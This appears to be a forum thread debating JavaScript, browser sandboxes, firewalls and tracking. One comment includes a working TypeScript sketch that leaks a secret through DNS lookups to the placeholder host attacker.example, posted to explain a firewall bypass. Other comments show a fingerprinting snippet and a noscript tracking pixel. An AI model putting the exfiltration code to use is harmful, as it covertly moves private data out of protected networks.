
If web sites have to be so dynamic, I much prefer that the computation involved is done on their machine rather than on mine. I simply don't trust random web sites enough to let them run code on my machines.


What is it you don't trust? This Fear, Uncertainty & Doubt clashes heavily with the excellent security sandbox that the web browser is. What is the harm you are afraid of? What are you supposing the risk is, and what's in jeopardy here?


Relying on sandboxes seems unwise to me. They're a useful backstop, but shouldn't be the primary defense. The primary defense is to minimize the exposure to risk in the first place.

As to what harm I'm avoiding, it's mostly around tracking -- which is something that browsers have a very difficult time preventing, especially if sites are allowed to run code in them.


So let's say a resume generator website, or a document converter, etc.

You trust uploading your personal information to a server to generate the pdf/image/whatever vs doing it solely in the browser?

Doing more on the server would lead to more tracking, not less.


Well, I wouldn't use such a website anyway (especially a document converter -- that is better done using a real application), regardless of where the processing was done, unless I was very certain that the website was trustworthy. For one thing, even if the website purports to not move my data to their servers, how do I know they're being truthful without going to extremes such as sniffing traffic?

There have been plenty of sites that have lied about such things.


You can swap out my examples for anything really.

The point is the more work the server does, the more data you have to send them to do that work.

As far as trusting that it's client-side only, opening the Network tab in devtools would suffice.

If you think they broke the sandbox (Google would pay millions for that!), then yes, sniffing would be the next step.

At least you have a sandbox on web, you usually don't have that for native apps.

But that's all better than willingly sending data to another entity's server and trusting them to not abuse/leak it.


With a couple of necessary exceptions, I don't use websites to store or process personal data, so that's not really the use case I have in mind.

What I have for native applications that I don't for the web is the ability to firewall off the native applications.


> What I have for native applications that I don't for the web is the ability to firewall off the native applications.

There you're placing trust in the firewall's sandbox. Are you sure the application can't communicate with the outside at all? DNS exfiltration, for example?
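To make the DNS angle concrete, here's a minimal sketch in TypeScript (for Node) of how that channel works. The domain attacker.example and the exfiltrate function are hypothetical; the point is that the lookup itself carries the data, so a firewall that permits DNS lets it out:

    // Sketch only. Assumes the attacker controls the authoritative
    // nameserver for attacker.example (hypothetical domain).
    import { promises as dns } from "node:dns";

    async function exfiltrate(secret: string): Promise<void> {
      // Hex-encode the payload so it forms valid DNS labels (a-z, 0-9).
      const encoded = Buffer.from(secret).toString("hex");
      // DNS labels max out at 63 bytes, so chunk long payloads.
      const chunks = encoded.match(/.{1,60}/g) ?? [];
      for (const [i, chunk] of chunks.entries()) {
        // The query itself is the channel: the attacker's nameserver
        // logs the name being asked for, even though no record exists.
        await dns.resolve(`${i}.${chunk}.attacker.example`).catch(() => {
          // NXDOMAIN is expected; the data already left the network.
        });
      }
    }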


A firewall is not a sandbox, but yes, I am sure that the applications can't communicate with the outside at all. My logs would show if they were. Any and all packets that originate from them are dropped, including DNS lookups and the like.
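On Linux, for example, one common way to get this per-application is to run the untrusted program as a dedicated user and filter on that user. A sketch, assuming iptables and a hypothetical user named "sandboxed":

    # Log, then drop, every packet that user originates, DNS included.
    iptables -A OUTPUT -m owner --uid-owner sandboxed -j LOG --log-prefix "sandboxed-drop: "
    iptables -A OUTPUT -m owner --uid-owner sandboxed -j DROP

The LOG rule is what makes the logs useful here: any attempted packet shows up before it's dropped.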


JS allows for fingerprinting. I only run JS on an opt-in basis, on sites like my bank and some pages I trust. You don't miss much, really.

https://amiunique.org/fp
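For a sense of what fingerprinting scripts collect, here's a hedged sketch in TypeScript of a few of the signals; real fingerprinting code gathers far more (canvas rendering, font enumeration, audio, etc.):

    // A few of the signals fingerprinting scripts combine. Each one is
    // common on its own; together they often identify a browser
    // near-uniquely, which is what amiunique.org demonstrates.
    function collectFingerprint(): Record<string, string | number> {
      return {
        userAgent: navigator.userAgent,
        language: navigator.language,
        screen: `${screen.width}x${screen.height}x${screen.colorDepth}`,
        timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
        cores: navigator.hardwareConcurrency,
        touchPoints: navigator.maxTouchPoints,
      };
    }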


"Has JS disabled" is in itself a good fingerprint factor though.


How would a website inform the server of that fact, though?


I dunno, how about <noscript> <img src="/ihavejsdisabled.png"/> </noscript> ? The browser only requests that image when JS is disabled, so the request showing up in the server's access log flags the visitor.


Actually, most people will miss out on most of the usable internet without JavaScript. Not everyone goes to the same sites as you or has the same browsing patterns.



